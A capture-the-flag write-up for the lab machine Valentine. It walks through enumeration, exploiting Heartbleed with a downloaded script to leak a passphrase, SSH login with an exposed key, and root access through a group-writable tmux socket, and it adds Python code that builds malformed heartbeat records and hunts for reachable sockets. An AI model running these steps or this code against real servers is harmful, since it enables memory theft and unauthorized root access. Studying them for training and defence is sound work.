Valentine Writeup
Introduction :
Valentine is an easy Linux box that was released back in February 2018. It features the well-known Heartbleed vulnerability (CVE-2014-0160).
Part 1 : Initial Enumeration
As always we begin our enumeration with Nmap to find open ports. We will be using the flags -sC for default scripts and -sV for version detection.
λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.79
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 18:09 CET
Nmap scan report for 10.10.10.79
Host is up (0.046s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
|_ssl-date: 2019-11-20T17:09:42+00:00; +10s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 9s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds
λ nihilist [ 10.10.14.48/23 ] [~] → sslscan 10.10.10.79
sslscan version 1.10.2
OpenSSL 1.0.2t 10 Sep 2019
Testing SSL server 10.10.10.79 on port 443
Preferred Server Cipher(s):
TLSv1 256 bits ECDHE-RSA-AES256-SHA
TLS11 256 bits ECDHE-RSA-AES256-SHA
TLS12 256 bits ECDHE-RSA-AES256-GCM-SHA384
SSL Certificate:
Certificate blob:
-----BEGIN CERTIFICATE-----
[certificate body omitted]
-----END CERTIFICATE-----
Version: 2
Serial Number: 85:ec:6d:f5:c5:84:b1:f2
Signature Algorithm: sha1WithRSAEncryption
Issuer: /C=US/ST=FL/O=valentine.htb/CN=valentine.htb
Not valid before: Feb 6 00:45:25 2018 GMT
Not valid after: Feb 6 00:45:25 2019 GMT
Subject: /C=US/ST=FL/O=valentine.htb/CN=valentine.htb
Public Key Algorithm: rsaEncryption
RSA Public Key: (2048 bit)
Public-Key: (2048 bit)
Modulus:
00:c3:28:17:ac:f8:19:2a:41:d2:8a:3f:ce:79:1c:
19:f4:fb:48:fa:d3:2f:33:6b:6f:c8:9c:f9:a3:bf:
19:66:a8:a1:8d:f9:22:62:0e:e1:9e:45:50:1f:59:
2f:ac:ba:95:cf:af:23:aa:54:c9:64:40:0f:25:a8:
c5:dd:cb:c4:1c:87:0c:d2:73:12:2e:77:76:cf:89:
48:fb:39:4a:e1:f5:3d:40:c3:b5:9a:82:68:f6:8d:
8c:b2:4d:3f:4f:03:09:c0:ba:ad:74:5d:53:64:b0:
57:6a:44:0f:1f:b7:f6:fb:05:88:ae:b2:c1:ca:de:
a6:fb:c5:66:77:46:29:75:60:d0:af:91:dd:59:30:
3a:0b:8f:85:21:e5:5d:c8:22:1c:56:ea:7a:2f:0d:
27:5c:e2:a7:d6:2e:55:46:17:87:22:d5:1b:66:62:
25:85:fa:09:1c:38:6d:1b:14:9e:a9:7a:e0:31:4d:
43:26:ce:b0:91:e6:d0:9b:48:d8:cf:4f:79:f9:af:
12:44:d4:65:e4:ff:77:47:56:85:4d:3b:e9:ad:db:
4d:eb:2d:29:97:f8:5a:9a:99:c3:ad:17:1a:6c:73:
a4:04:1f:e5:d5:8e:a8:c7:a6:20:ae:8a:e0:50:b8:
f1:b2:d2:48:de:7d:b3:89:0d:b6:e8:6d:c7:a3:82:
5e:97
Exponent: 65537 (0x10001)
X509v3 Extensions:
X509v3 Subject Key Identifier:
DC:D6:5B:22:6C:72:E0:13:C8:55:B2:7C:B4:76:61:EB:F5:4F:8D:F9
X509v3 Authority Key Identifier:
keyid:DC:D6:5B:22:6C:72:E0:13:C8:55:B2:7C:B4:76:61:EB:F5:4F:8D:F9
X509v3 Basic Constraints:
CA:TRUE
Verify Certificate:
self signed certificate
Part 2 : Getting User Access
Port 80 is running Apache 2.2.22. Let's run dirb against it to find out which directories and files we can reach.
λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.79/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 20 18:14:59 2019
URL_BASE: http://10.10.10.79/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.79/ ----
+ http://10.10.10.79/cgi-bin/ (CODE:403|SIZE:287)
+ http://10.10.10.79/decode (CODE:200|SIZE:552)
==> DIRECTORY: http://10.10.10.79/dev/
+ http://10.10.10.79/encode (CODE:200|SIZE:554)
+ http://10.10.10.79/index (CODE:200|SIZE:38)
+ http://10.10.10.79/index.php (CODE:200|SIZE:38)
+ http://10.10.10.79/server-status (CODE:403|SIZE:292)
---- Entering directory: http://10.10.10.79/dev/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Nov 20 18:18:00 2019
DOWNLOADED: 4612 - FOUND: 6
According to dirb, directory listing is enabled on /dev/. Let's open it in a browser to check.
λ nihilist [ 10.10.14.48/23 ] [~] → lynx http://10.10.10.79/
We find a file named hype_key that appears to be hex-encoded. We first use curl with the -s (silent) and -k (ignore TLS certificate errors) flags to download it, then xxd with the -r (reverse) and -p (plain hex dump) flags to convert the hex back into its original ASCII characters.
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → curl -sk http://10.10.10.79/dev/hype_key > hype_key
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → cat hype_key | xxd -r -p
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
[encrypted key body omitted]
-----END RSA PRIVATE KEY-----
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → cat hype_key | xxd -r -p > Hype.ssh.key
Now we have decoded the hype SSH key and saved it locally as "Hype.ssh.key". Note that it is decoded, not decrypted: the "Proc-Type: 4,ENCRYPTED" and "DEK-Info: AES-128-CBC,..." headers mean the key material is still encrypted with a passphrase, which we will need before SSH can use it. When we open the browser at http://10.10.10.79/ we are greeted with an image that alludes to the Heartbleed vulnerability. Let's test whether this machine is vulnerable to Heartbleed (CVE-2014-0160), the OpenSSL bug in which a malformed TLS heartbeat request makes the server return up to 64 KB of its process memory. To do so we first download the heartbleed.py script and read through it to check how it is used.
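As an added example (not part of the original writeup), the following Python 3 code does what the curl | xxd -r -p pipeline does and adds the two checks worth making before trying the key: whether the PEM carries the legacy OpenSSL Proc-Type/DEK-Info encryption headers (so a passphrase is required), and writing the file with mode 0600 from the start so ssh accepts it. The hex dump used as input is a constructed fake key header laid out the way xxd -p prints it; it is not the real hype_key.

```python
import binascii
import os
import re
import stat
import tempfile

# Constructed sample in `xxd -p` layout (60 hex digits per line). It is a fake
# PEM with only the headers the real hype_key had; the body is filler.
SAMPLE_HEX = binascii.hexlify(
    b"-----BEGIN RSA PRIVATE KEY-----\n"
    b"Proc-Type: 4,ENCRYPTED\n"
    b"DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46\n"
    b"\n"
    b"QUJDREVGR0hJSktMTU5PUA==\n"
    b"-----END RSA PRIVATE KEY-----\n"
).decode()
SAMPLE_HEX = "\n".join(SAMPLE_HEX[i:i + 60] for i in range(0, len(SAMPLE_HEX), 60))


def decode_hex_dump(text):
    """Equivalent of `xxd -r -p`: ignore everything that is not a hex digit
    (newlines, spaces) and decode the remaining nibbles to bytes."""
    digits = re.sub(r"[^0-9a-fA-F]", "", text)
    if len(digits) % 2:
        raise ValueError("odd number of hex digits; dump is truncated or not hex")
    return binascii.unhexlify(digits)


def pem_encryption_info(pem):
    """Return (cipher, iv_hex) when the PEM uses the legacy OpenSSL encrypted
    format (Proc-Type: 4,ENCRYPTED + DEK-Info), else None. Such a key needs a
    passphrase before ssh will use it."""
    text = pem.decode("ascii", errors="replace")
    if "Proc-Type: 4,ENCRYPTED" not in text:
        return None
    m = re.search(r"^DEK-Info:\s*([A-Z0-9-]+),([0-9A-Fa-f]+)\s*$", text, re.M)
    if not m:
        raise ValueError("ENCRYPTED key without a DEK-Info header")
    return m.group(1), m.group(2)


def save_private_key(pem, path=None):
    """Write the key with mode 0600 at creation time, so ssh never sees it with
    wider permissions ('UNPROTECTED PRIVATE KEY FILE'). Returns (path, mode)."""
    if path is None:  # default to a fresh temp dir, e.g. for the demo below
        path = os.path.join(tempfile.mkdtemp(prefix="keys-"), "Hype.ssh.key")
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(pem)
    os.chmod(path, 0o600)  # covers a pre-existing file with looser mode
    return path, stat.S_IMODE(os.stat(path).st_mode)


if __name__ == "__main__":
    pem = decode_hex_dump(SAMPLE_HEX)
    print(pem.decode())
    info = pem_encryption_info(pem)
    print("passphrase required:", info is not None, info)
    print("saved as %s with mode %o" % save_private_key(pem))
```

Swap SAMPLE_HEX for the contents of the downloaded hype_key and the same three steps apply; if pem_encryption_info returns None the key is usable as-is, otherwise ssh will prompt for the passphrase.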
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → curl -sk https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py > heartbleed.py
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → nano heartbleed.py
We run it with python2, passing -n 201 to send 201 heartbeat requests: each response leaks a different slice of the server's memory, so more requests raise the chance of catching something interesting, such as another user's request.
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → python2 heartbleed.py 10.10.10.79 -n 201
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
##################################################################
Connecting to: 10.10.10.79:443, 201 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0
WARNING: 10.10.10.79:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 201 of 201
##################################################################
).(B...}.@....SC[...r....+..H...9...BlCg==
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
Among the leaked memory is a POST request to /decode.php on 127.0.0.1 whose body carries a base64-encoded value in the $text parameter. This is the web server's own memory from an earlier request to the /decode page, so we decode the value with the base64 command and its -d flag.
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
heartbleedbelievethehype
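To make the detection step concrete, here is an added example (not from the original writeup or from the heartbleed.py gist) in Python 3 that builds the malformed heartbeat record, parses the TLS records a server sends back, separates leaked memory from a correct or alert response, and pulls the $text parameter out of the leak the way we did by eye above. The network exchange itself is omitted: the script used on the page performs the TLS ClientHello first and sends this record after the handshake. The sample server responses are constructed; only the base64 value is the one the real box returned.

```python
import base64
import re
import struct

# TLS record content types and heartbeat message types (RFC 6520).
TLS_ALERT = 0x15
TLS_HEARTBEAT = 0x18
HB_REQUEST = 0x01
HB_RESPONSE = 0x02
TLS10 = b"\x03\x01"


def build_heartbeat_request(claimed_len=0x4000, payload=b"", version=TLS10):
    """TLS record carrying a heartbeat request whose declared payload length
    (claimed_len) is far larger than the payload actually sent. Patched OpenSSL
    drops it; a vulnerable build echoes claimed_len bytes copied from its heap
    (CVE-2014-0160)."""
    body = bytes([HB_REQUEST]) + struct.pack(">H", claimed_len) + payload
    return bytes([TLS_HEARTBEAT]) + version + struct.pack(">H", len(body)) + body


def parse_tls_records(buf):
    """Split raw socket bytes into (content_type, payload) tuples. A truncated
    trailing record is ignored rather than mis-parsed."""
    records, off = [], 0
    while off + 5 <= len(buf):
        ctype = buf[off]
        length = struct.unpack(">H", buf[off + 3:off + 5])[0]
        if off + 5 + length > len(buf):
            break
        records.append((ctype, buf[off + 5:off + 5 + length]))
        off += 5 + length
    return records


def leaked_memory(records, sent_payload_len=0):
    """Bytes a heartbeat response carried beyond what we sent, i.e. leaked
    server memory. b"" means the server answered correctly or with an alert."""
    for ctype, payload in records:
        if ctype != TLS_HEARTBEAT or len(payload) < 3 or payload[0] != HB_RESPONSE:
            continue
        declared = struct.unpack(">H", payload[1:3])[0]
        data = payload[3:3 + declared]
        if len(data) > sent_payload_len:
            return data[sent_payload_len:]
    return b""


def printable_strings(data, min_len=8):
    """Equivalent of `strings`: runs of printable ASCII inside the leak."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def decode_text_param(data):
    """Locate a '$text=<base64>' form parameter in the leak (the /decode.php
    request seen on Valentine) and decode it; None if absent."""
    m = re.search(rb"\$text=([A-Za-z0-9+/=]+)", data)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", errors="replace").strip()


# Constructed sample of a vulnerable server's reply: heap memory holding someone
# else's POST to /decode.php. Only the base64 value is what the real box leaked.
SAMPLE_LEAK = (
    b"\x00" * 32
    + b"POST /decode.php HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    + b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 42\r\n\r\n"
    + b"$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg=="
    + b"\x00" * 16
)


def sample_vulnerable_response(leak=SAMPLE_LEAK):
    body = bytes([HB_RESPONSE]) + struct.pack(">H", len(leak)) + leak + b"\x00" * 16
    return bytes([TLS_HEARTBEAT]) + TLS10 + struct.pack(">H", len(body)) + body


def sample_patched_response():
    # A patched server stays silent or sends a fatal alert; this is an alert
    # record (level 2 = fatal, description 10 = unexpected_message).
    return bytes([TLS_ALERT]) + TLS10 + b"\x00\x02\x02\x0a"


if __name__ == "__main__":
    leak = leaked_memory(parse_tls_records(sample_vulnerable_response()))
    print("vulnerable" if leak else "not vulnerable")
    for s in printable_strings(leak):
        print(s)
    print("decoded $text:", decode_text_param(leak))
```

The vulnerability test is the comparison in leaked_memory: a correct implementation can never return more payload than it received, so any surplus is memory disclosure regardless of what it contains. Reading the surplus with printable_strings is what turns a yes/no check into the credential above.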
Now we try to log onto the box over SSH using the decoded Hype.ssh.key along with the passphrase "heartbleedbelievethehype". The username hype is taken from the key's file name.
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → ssh -i Hype.ssh.key hype@10.10.10.79
The authenticity of host '10.10.10.79 (10.10.10.79)' can't be established.
ECDSA key fingerprint is SHA256:lqH8pv30qdlekhX8RTgJTq79ljYnL2cXflNTYu8LS5w.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.79' (ECDSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'Hype.ssh.key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "Hype.ssh.key": bad permissions
SSH refuses to use a private key that other users can read. Let's not forget to restrict the key's permissions to 600 (read and write for the owner, nothing for group and others) with chmod 600 Hype.ssh.key before retrying:
λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → ssh -i Hype.ssh.key hype@10.10.10.79
Enter passphrase for key 'Hype.ssh.key':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$ uname -a
Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
hype@Valentine:~$ cat /home/hype/Desktop/user.txt
e6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
We have been able to print out the user flag. The combination of the SSH key found on the web server and the passphrase leaked through Heartbleed gave us access to the machine as the "hype" user.
Part 3 : Getting Root Access
In order to escalate privileges we will first have to take a look at what we can work with, starting with the .bash_history file.
hype@Valentine:~$ cat .bash_history
exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
exit
It seems the user hype was working with a tmux session whose socket lives in a hidden /.devs directory. Just like in the .bash_history file, we use ls with the -a flag to list hidden entries and navigate our way in.
hype@Valentine:~$ cd /
hype@Valentine:/$ ls -la
total 108
drwxr-xr-x 26 root root 4096 Feb 6 2018 .
drwxr-xr-x 26 root root 4096 Feb 6 2018 ..
drwxr-xr-x 2 root root 4096 Dec 11 2017 bin
drwxr-xr-x 3 root root 4096 Feb 16 2018 boot
drwxr-xr-x 2 root root 4096 Dec 11 2017 cdrom
drwxr-xr-x 13 root root 4060 Nov 20 09:07 dev
drwxr-xr-x 2 root root 4096 Dec 13 2017 devs
drwxr-xr-x 2 root hype 4096 Nov 20 09:07 .devs
drwxr-xr-x 132 root root 12288 Nov 20 09:07 etc
drwxr-xr-x 3 root root 4096 Dec 11 2017 home
lrwxrwxrwx 1 root root 32 Dec 11 2017 initrd.img -> boot/initrd.img-3.2.0-23-generic
drwxr-xr-x 21 root root 4096 Dec 11 2017 lib
drwxr-xr-x 2 root root 4096 Apr 25 2012 lib64
drwx------ 2 root root 16384 Dec 11 2017 lost+found
drwxr-xr-x 3 root root 4096 Apr 25 2012 media
drwxr-xr-x 3 root root 4096 Dec 11 2017 mnt
drwx------ 2 root root 4096 Dec 13 2017 opt
dr-xr-xr-x 92 root root 0 Nov 20 09:07 proc
drwx------ 4 root root 4096 Feb 6 2018 root
drwxr-xr-x 20 root root 740 Nov 20 10:02 run
drwxr-xr-x 2 root root 4096 Feb 16 2018 sbin
drwxr-xr-x 2 root root 4096 Mar 5 2012 selinux
drwxr-xr-x 2 root root 4096 Apr 25 2012 srv
drwxr-xr-x 13 root root 0 Nov 20 09:07 sys
drwxrwxrwt 5 root root 4096 Nov 20 10:08 tmp
drwxr-xr-x 10 root root 4096 Apr 25 2012 usr
drwxr-xr-x 14 root root 4096 Feb 6 2018 var
lrwxrwxrwx 1 root root 29 Dec 11 2017 vmlinuz -> boot/vmlinuz-3.2.0-23-generic
hype@Valentine:/$ cd .devs
hype@Valentine:/.devs$ ls
dev_sess
Let's reproduce hype's steps: the tmux -S flag tells the client to connect to a tmux server through the given socket path, here the dev_sess file.
hype@Valentine:/.devs$ ls -l
total 0
srw-rw---- 1 root hype 0 Nov 20 09:07 dev_sess
The dev_sess socket is owned by root but belongs to the hype group with mode srw-rw----, so our user has write access to it and can connect to the root-owned tmux server. The shell inside that session runs as root, so attaching to it gives us a root shell.
hype@Valentine:/.devs$ tmux -S dev_sess
root@Valentine:/.devs# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/.devs# cat /root/root.txt
f1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We have been able to print out the root flag.
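The misconfiguration behind the root shell is a Unix socket that a privileged user left reachable by an unprivileged group. As an added example that is not part of the original writeup, here is a Python 3 helper that enumerates sockets owned by another user which the current user can still connect to, plus a self-contained demo that rebuilds the /.devs/dev_sess situation in a temporary directory (the scanning user is simulated by passing a different uid that shares our group, since the demo cannot create root-owned files). This is hypothetical code written for this page; nothing in it comes from tmux or the box.

```python
import os
import socket
import stat
import tempfile
from collections import namedtuple

# Stand-in for os.stat_result so the permission check can be exercised on
# constructed records as well as on real files.
SockInfo = namedtuple("SockInfo", "st_mode st_uid st_gid")


def can_connect(st, uid, gids):
    """Whether a process running as uid with groups gids may connect() to the
    Unix socket described by st. connect() on a socket file requires write
    permission on it, so the write bit of the matching class is what counts."""
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def find_foreign_sockets(root, uid=None, gids=None):
    """Walk root and list Unix sockets owned by someone else (typically root)
    that this user can still connect to. A tmux server socket in that list,
    like /.devs/dev_sess on Valentine, hands over the session owner's shell."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) | {os.getgid()} if gids is None else set(gids)
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:  # sockets are non-directory entries
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISSOCK(st.st_mode) and st.st_uid != uid and can_connect(st, uid, gids):
                hits.append(path)
    return sorted(hits)


def demo():
    """Recreate the Valentine layout in a temp dir: a socket with mode 0660
    owned by us, then scan as a pretend other user who shares our group (the
    position hype was in). Returns the reachable foreign sockets found."""
    d = tempfile.mkdtemp(prefix="devs-")
    sock_path = os.path.join(d, "dev_sess")
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    srv.bind(sock_path)
    os.chmod(sock_path, 0o660)  # srw-rw---- as seen on the box
    try:
        return find_foreign_sockets(d, uid=os.getuid() + 1, gids={os.getgid()})
    finally:
        srv.close()
        os.unlink(sock_path)
        os.rmdir(d)


if __name__ == "__main__":
    print("reachable foreign sockets:", demo())
```

On a real target run find_foreign_sockets("/") as the low-privileged user; a hit is only useful if the listener behind it hands out privileges, which a tmux server does by design since every client of a server shares its sessions, so the fix is socket mode 0600 or a group containing only the intended users.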
Conclusion
The chain on this box was: a hex-encoded, passphrase-protected SSH key exposed in the listable /dev/ directory, its passphrase recovered from the web server's memory through Heartbleed (CVE-2014-0160), and a root tmux session whose socket had been left group-writable by the hype user.